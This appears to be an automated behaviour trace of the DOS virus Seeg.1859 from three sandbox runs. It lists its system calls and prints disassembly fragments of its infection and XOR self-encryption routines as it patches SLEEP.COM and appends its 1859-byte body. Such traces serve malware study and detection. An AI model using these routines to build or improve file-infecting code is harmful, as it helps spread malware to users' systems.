
vx.netlux.org/Virus.DOS.Seeg.1859


Syscalls:

Time    Syscall Op (INT 21h AH, decimal)    PC | Syscall Name
2018-12-17T22:16:06.832484358Z 53 PC: 12f4c | Get interrupt vector (Interrupt = '36' AKA 'Set random record number'; note: interrupt 36 decimal is INT 24h, the DOS critical-error handler vector — the 'Set random record number' label is the name of INT 21h function AH=24h, not of the interrupt; the same applies to the other 'Interrupt = 36' entries in this trace)
2018-12-17T22:16:06.835114419Z 37 PC: 12f5f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:16:06.836390035Z 73 PC: 12d8e | Release memory
2018-12-17T22:16:06.837770812Z 72 PC: 12d9b | Allocate memory
2018-12-17T22:16:06.839504161Z 74 PC: 12da9 | Reallocate memory
2018-12-17T22:16:06.841531485Z 72 PC: 12db1 | Allocate memory
2018-12-17T22:16:06.843291575Z 44 PC: 12dc9 | Get time
0x12dc9: cmp dh, 0x22
0x12dcc: jne 0x12dd1
0x12dce: call 0x12eef
0x12dd1: push es
0x12dd2: call 0x1300f
0x12dd5: pop es
0x12dd6: call 0x13109
0x12dd9: lea si, word ptr [bp + 0x39e]
0x12ddd: mov ax, dx
0x12ddf: xor bx, bx
0x12de1: call 0x12f19
0x12de4: xor ax, 0x1234
0x12de7: call 0x12f19
0x12dea: mov ax, word ptr [si]
0x12dec: xor ah, ah
0x12dee: mov bl, 2
0x12df0: div bl
0x12df2: xor ah, ah
0x12df4: mov byte ptr [bp + 0x3ad], al
0x12df8: push si
2018-12-17T22:16:06.846282937Z 26 PC: 1312a | Set disk transfer address
2018-12-17T22:16:06.847854864Z 78 PC: 13133 | Find first file
2018-12-17T22:16:06.851740644Z 67 PC: 1319c | Get or set file attributes
2018-12-17T22:16:06.864090391Z 61 PC: 131ad | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:16:06.871423493Z 66 PC: 131bc | Move file pointer
2018-12-17T22:16:06.873289425Z 63 PC: 131c7 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:16:06.880121645Z 66 PC: 131ef | Move file pointer
2018-12-17T22:16:06.883823463Z 64 PC: 131fa | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:16:06.887077592Z 66 PC: 13202 | Move file pointer
2018-12-17T22:16:06.889004093Z 64 PC: 13211 | Write file or device (Write 225 bytes on handle 5)
2018-12-17T22:16:06.898439793Z 44 PC: 13215 | Get time
0x13215: push ds
0x13216: mov cx, 0x381
0x13219: mov si, 0x8a
0x1321c: mov word ptr es:[0x23], dx
0x13221: xor word ptr es:[si], dx
0x13224: inc si
0x13225: sub dx, 0xdead
0x13229: inc si
0x1322a: loop 0x13221
0x1322c: push bx
0x1322d: xor ax, ax
0x1322f: mov al, byte ptr [bp + 0x3ae]
0x13233: mov bl, 3
0x13235: mul bl
0x13237: add ax, 3
0x1323a: mov word ptr [bp + 0x3af], ax
0x1323e: lea si, word ptr [bp + 0x2aa]
0x13242: xor di, di
0x13244: movsb byte ptr es:[di], byte ptr [si]
0x13245: mov bx, word ptr [bp + 0x27c]
2018-12-17T22:16:06.90237356Z 64 PC: 132b1 | Write file or device (Write 16 bytes on handle 5)
2018-12-17T22:16:06.905761631Z 64 PC: 132bc | Write file or device (Write 1859 bytes on handle 5)
2018-12-17T22:16:06.915389458Z 87 PC: 132d1 | Get or set file date and time
2018-12-17T22:16:06.91737672Z 62 PC: 132d5 | Close file
2018-12-17T22:16:06.924926184Z 37 PC: 12f46 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:16:06.926483316Z 73 PC: 132de | Release memory
2018-12-17T22:16:06.92869152Z 9 PC: 12a4a | Display string (String= ' ������ 䠩�� 320 ���� ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2903,"SideJobID":0}


Syscalls:

Time    Syscall Op (INT 21h AH, decimal)    PC | Syscall Name
2018-12-25T11:47:42.497320407Z 53 PC: 12f4c | Get interrupt vector (Interrupt = '36' AKA 'Set random record number'; note: interrupt 36 decimal is INT 24h, the DOS critical-error handler vector — the 'Set random record number' label is the name of INT 21h function AH=24h, not of the interrupt; the same applies to the other 'Interrupt = 36' entries in this trace)
2018-12-25T11:47:42.499104285Z 37 PC: 12f5f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:47:42.500460543Z 73 PC: 12d8e | Release memory
2018-12-25T11:47:42.501788928Z 72 PC: 12d9b | Allocate memory
2018-12-25T11:47:42.50426887Z 74 PC: 12da9 | Reallocate memory
2018-12-25T11:47:42.505513396Z 72 PC: 12db1 | Allocate memory
2018-12-25T11:47:42.507029238Z 44 PC: 12dc9 | Get time
0x12dc9: cmp dh, 0x22
0x12dcc: jne 0x12dd1
0x12dce: call 0x12eef
0x12dd1: push es
0x12dd2: call 0x1300f
0x12dd5: pop es
0x12dd6: call 0x13109
0x12dd9: lea si, word ptr [bp + 0x39e]
0x12ddd: mov ax, dx
0x12ddf: xor bx, bx
0x12de1: call 0x12f19
0x12de4: xor ax, 0x1234
0x12de7: call 0x12f19
0x12dea: mov ax, word ptr [si]
0x12dec: xor ah, ah
0x12dee: mov bl, 2
0x12df0: div bl
0x12df2: xor ah, ah
0x12df4: mov byte ptr [bp + 0x3ad], al
0x12df8: push si
2018-12-25T11:47:42.509828814Z 26 PC: 1312a | Set disk transfer address
2018-12-25T11:47:42.510793157Z 78 PC: 13133 | Find first file
2018-12-25T11:47:42.514943027Z 67 PC: 1319c | Get or set file attributes
2018-12-25T11:47:42.778398361Z 61 PC: 131ad | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:47:42.78576731Z 66 PC: 131bc | Move file pointer
2018-12-25T11:47:42.787284347Z 63 PC: 131c7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:47:42.793931099Z 66 PC: 131ef | Move file pointer
2018-12-25T11:47:42.796109727Z 64 PC: 131fa | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:42.798955032Z 66 PC: 13202 | Move file pointer
2018-12-25T11:47:42.800236702Z 64 PC: 13211 | Write file or device (Write 33 bytes on handle 5)
2018-12-25T11:47:42.809103771Z 44 PC: 13215 | Get time
0x13215: push ds
0x13216: mov cx, 0x381
0x13219: mov si, 0x8a
0x1321c: mov word ptr es:[0x23], dx
0x13221: xor word ptr es:[si], dx
0x13224: inc si
0x13225: sub dx, 0xdead
0x13229: inc si
0x1322a: loop 0x13221
0x1322c: push bx
0x1322d: xor ax, ax
0x1322f: mov al, byte ptr [bp + 0x3ae]
0x13233: mov bl, 3
0x13235: mul bl
0x13237: add ax, 3
0x1323a: mov word ptr [bp + 0x3af], ax
0x1323e: lea si, word ptr [bp + 0x2aa]
0x13242: xor di, di
0x13244: movsb byte ptr es:[di], byte ptr [si]
0x13245: mov bx, word ptr [bp + 0x27c]
2018-12-25T11:47:42.815108486Z 64 PC: 132b1 | Write file or device (Write 16 bytes on handle 5)
2018-12-25T11:47:42.817963225Z 64 PC: 132bc | Write file or device (Write 1859 bytes on handle 5)
2018-12-25T11:47:42.82682469Z 87 PC: 132d1 | Get or set file date and time
2018-12-25T11:47:42.828221391Z 62 PC: 132d5 | Close file
2018-12-25T11:47:42.835893979Z 37 PC: 12f46 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:47:42.83766157Z 73 PC: 132de | Release memory
2018-12-25T11:47:42.838864328Z 9 PC: 12a4a | Display string (String= ' ������ 䠩�� 320 ���� ')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":34,"TimeBased":true,"OriginalID":2903,"SideJobID":0}


Syscalls:

Time    Syscall Op (INT 21h AH, decimal)    PC | Syscall Name
2018-12-25T11:47:42.702370007Z 53 PC: 12f4c | Get interrupt vector (Interrupt = '36' AKA 'Set random record number'; note: interrupt 36 decimal is INT 24h, the DOS critical-error handler vector — the 'Set random record number' label is the name of INT 21h function AH=24h, not of the interrupt; the same applies to the other 'Interrupt = 36' entries in this trace)
2018-12-25T11:47:42.703774841Z 37 PC: 12f5f | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:47:42.704697615Z 73 PC: 12d8e | Release memory
2018-12-25T11:47:42.705696868Z 72 PC: 12d9b | Allocate memory
2018-12-25T11:47:42.707522291Z 74 PC: 12da9 | Reallocate memory
2018-12-25T11:47:42.708511862Z 72 PC: 12db1 | Allocate memory
2018-12-25T11:47:42.709544345Z 44 PC: 12dc9 | Get time
0x12dc9: cmp dh, 0x22
0x12dcc: jne 0x12dd1
0x12dce: call 0x12eef
0x12dd1: push es
0x12dd2: call 0x1300f
0x12dd5: pop es
0x12dd6: call 0x13109
0x12dd9: lea si, word ptr [bp + 0x39e]
0x12ddd: mov ax, dx
0x12ddf: xor bx, bx
0x12de1: call 0x12f19
0x12de4: xor ax, 0x1234
0x12de7: call 0x12f19
0x12dea: mov ax, word ptr [si]
0x12dec: xor ah, ah
0x12dee: mov bl, 2
0x12df0: div bl
0x12df2: xor ah, ah
0x12df4: mov byte ptr [bp + 0x3ad], al
0x12df8: push si
2018-12-25T11:47:42.711987496Z 26 PC: 1312a | Set disk transfer address
2018-12-25T11:47:42.713162709Z 78 PC: 13133 | Find first file
2018-12-25T11:47:42.719257174Z 67 PC: 1319c | Get or set file attributes
2018-12-25T11:47:42.778622983Z 61 PC: 131ad | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:47:42.785354307Z 66 PC: 131bc | Move file pointer
2018-12-25T11:47:42.786981433Z 63 PC: 131c7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:47:42.791603282Z 66 PC: 131ef | Move file pointer
2018-12-25T11:47:42.792558133Z 64 PC: 131fa | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:47:42.794556789Z 66 PC: 13202 | Move file pointer
2018-12-25T11:47:42.802451908Z 64 PC: 13211 | Write file or device (Write 71 bytes on handle 5)
2018-12-25T11:47:42.804989844Z 44 PC: 13215 | Get time
0x13215: push ds
0x13216: mov cx, 0x381
0x13219: mov si, 0x8a
0x1321c: mov word ptr es:[0x23], dx
0x13221: xor word ptr es:[si], dx
0x13224: inc si
0x13225: sub dx, 0xdead
0x13229: inc si
0x1322a: loop 0x13221
0x1322c: push bx
0x1322d: xor ax, ax
0x1322f: mov al, byte ptr [bp + 0x3ae]
0x13233: mov bl, 3
0x13235: mul bl
0x13237: add ax, 3
0x1323a: mov word ptr [bp + 0x3af], ax
0x1323e: lea si, word ptr [bp + 0x2aa]
0x13242: xor di, di
0x13244: movsb byte ptr es:[di], byte ptr [si]
0x13245: mov bx, word ptr [bp + 0x27c]
2018-12-25T11:47:42.810123709Z 64 PC: 132b1 | Write file or device (Write 25 bytes on handle 5)
2018-12-25T11:47:42.812892331Z 64 PC: 132bc | Write file or device (Write 1859 bytes on handle 5)
2018-12-25T11:47:42.821413505Z 87 PC: 132d1 | Get or set file date and time
2018-12-25T11:47:42.822694693Z 62 PC: 132d5 | Close file
2018-12-25T11:47:42.830286958Z 37 PC: 12f46 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:47:42.831626461Z 73 PC: 132de | Release memory
2018-12-25T11:47:42.832721068Z 9 PC: 12a4a | Display string (String= ' ������ 䠩�� 320 ���� ')